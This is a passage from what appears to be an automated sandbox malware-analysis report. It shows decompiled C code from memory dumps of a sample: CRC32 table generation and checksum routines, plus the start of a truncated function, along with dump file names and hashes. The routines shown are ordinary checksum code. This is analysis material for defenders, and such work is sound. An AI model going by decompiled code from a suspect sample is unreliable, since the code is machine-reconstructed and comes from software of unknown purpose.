0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t83 = _t83 + 1;
				} while (_t83 < 0x100);
				_t43 = 0x41f3e4;
				_t84 = 0x1c0;
				do {
					_t3 = _t43 - 4; // 0x0
					_t43 = _t43 + 0x10;
					 *(_t43 + 0x3ec) =  *_t3 >> 0x00000008 ^  *(0x41f3e0 + ( *_t3 & 0x000000ff) * 4);
					_t7 = _t43 - 0x10; // 0x0
					 *(_t43 + 0x3f0) =  *_t7 >> 0x00000008 ^  *(0x41f3e0 + ( *_t7 & 0x000000ff) * 4);
					_t11 = _t43 - 0xc; // 0x0
					 *(_t43 + 0x3f4) =  *_t11 >> 0x00000008 ^  *(0x41f3e0 + ( *_t11 & 0x000000ff) * 4);
					_t15 = _t43 - 8; // 0x4192a0
					_t84 = _t84 - 1;
					 *(_t43 + 0x3f8) =  *_t15 >> 0x00000008 ^  *(0x41f3e0 + ( *_t15 & 0x000000ff) * 4);
				} while (_t84 != 0);
				 *0x41f3d0 = 0x419380;
				 *0x4213e0 = 0x419380;
				 *0x41f3cc = 0x4192a0;
				_t45 = E00414210();
				if(_t45 == 0) {
					 *0x4213e0 = 0x4192a0;
				}
				return _t45;
			}

0x00418c30
0x00418c32
0x00418cb8
0x00418cbf
0x00418cc0
0x00418ccc
0x00418cd1
0x00418cd7
0x00418cd7
0x00418cec
0x00418cef
0x00418cf5
0x00418d0a
0x00418d10
0x00418d25
0x00418d2b
0x00418d40
0x00418d41
0x00418d41
0x00418d53
0x00418d58
0x00418d5d
0x00418d63
0x00418d6a
0x00418d6c
0x00418d6c
0x00418d73

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8ad514181f1392663617d37fa5aac287f30e1f120c9b56e1846f19667033fd
Instruction ID: 2418e866784658efeedf78a8b367f27fd94d949eb5011ce8ce344a4822a165bc
Opcode Fuzzy Hash: 7e8ad514181f1392663617d37fa5aac287f30e1f120c9b56e1846f19667033fd
Instruction Fuzzy Hash: 3A316177BA091A4BD70CCA28EC73AB96281E744345B88527EED5BCB3D1DF6C8841C64C

Uniqueness

Uniqueness Score: -1.00%

Function 004192A1, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004192A1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

0x004192a1
0x004192a4
0x004192a6
0x004192aa
0x004192b0
0x004192b6
0x004192be
0x004192c1
0x004192ca
0x004192ce
0x004192cf
0x00000000
0x00000000
0x00000000
0x004192cf
0x004192d4
0x004192da
0x004192dc
0x004192e3
0x004192e6
0x004192e8
0x004192eb
0x004192f0
0x004192f4
0x004192fe
0x00419308
0x0041931f
0x0041934b
0x0041934d
0x0041934d
0x00419352
0x00419355
0x0041935b
0x00000000
0x0041935d
0x00419361
0x00419364
0x0041936d
0x00419371
0x00419371
0x00419378
0x00419378
0x004192d4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 6afb9c83622f7667f84253346451ad0de7d4bb496f1525738c8a557abb0a02b9
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: E82107329006254BCB42CE6EE4845A7F3D2FBC536AF274B27ED9463291C638EC55C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041937B, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041937B(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}

0x0041937b
0x00419384
0x00419386
0x0041938a
0x00419390
0x00419396
0x0041939e
0x004193a1
0x004193aa
0x004193ae
0x004193af
0x00000000
0x00000000
0x00000000
0x004193af
0x004193b4
0x004193ba
0x004193bc
0x004193c3
0x004193c6
0x004193c8
0x004193d0
0x00419426
0x0041942d
0x0041942d
0x00419432
0x00419435
0x0041943b
0x00000000
0x0041943d
0x00419441
0x00419444
0x0041944d
0x00419451
0x00419451
0x00419458
0x00419458
0x004193b4
0x00000000

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: 4a8f15c690feeceaa45f30d21297364ae44fa9dd8c83136557fcfb88ab79e8e9
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: A521257251442987C301DF2DE4986B7B3E1FFD8319FA78A2AD8928B280C638DC85D690

Uniqueness

Uniqueness Score: -1.00%

Function 0040F30E, Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 452
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040F30E(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t255;
				signed int _t271;
				void* _t272;
				signed int _t278;
				intOrPtr _t282;
				signed int _t285;
				signed int _t304;
				signed int _t305;
				intOrPtr _t306;
				void* _t314;
				char* _t315;
				void* _t317;
				char* _t318;
				void* _t319;
				char* _t320;
				signed int _t322;
				signed int _t333;
				intOrPtr _t337;
				signed int _t342;
				signed int _t344;
				signed int _t349;
				void* _t354;
				int _t357;
				signed int _t358;
				intOrPtr* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t373;
				intOrPtr _t391;
				signed int _t393;
				intOrPtr _t399;
				signed int _t401;
				signed int _t407;
				intOrPtr* _t415;
				intOrPtr _t417;
				intOrPtr* _t418;
				char _t420;
				void* _t425;
				signed int _t431;
				intOrPtr* _t436;
				void* _t441;
				void* _t443;

				E00418D80(E0041A4FC, _t443);
				_t441 = __ecx;
				E0040F16C(__ecx, __edx, _t443, __eflags, 0xb, 0);
				_t255 = E0040EB3D( *((intOrPtr*)(_t441 + 0x38)), __edx, __eflags);
				 *(_t443 - 0x4c) =  *(_t443 - 0x4c) & 0x00000000;
				 *(_t443 - 0x4b) =  *(_t443 - 0x4b) & 0x00000000;
				 *((intOrPtr*)(_t443 - 0x18)) = _t255;
				 *((intOrPtr*)(_t443 - 0x1c)) = 0;
				 *(_t443 - 4) = 0;
				E0040E913(_t443 - 0x50, __eflags, _t441,  *(_t443 + 8));
				_t436 =  *((intOrPtr*)(_t443 + 0xc));
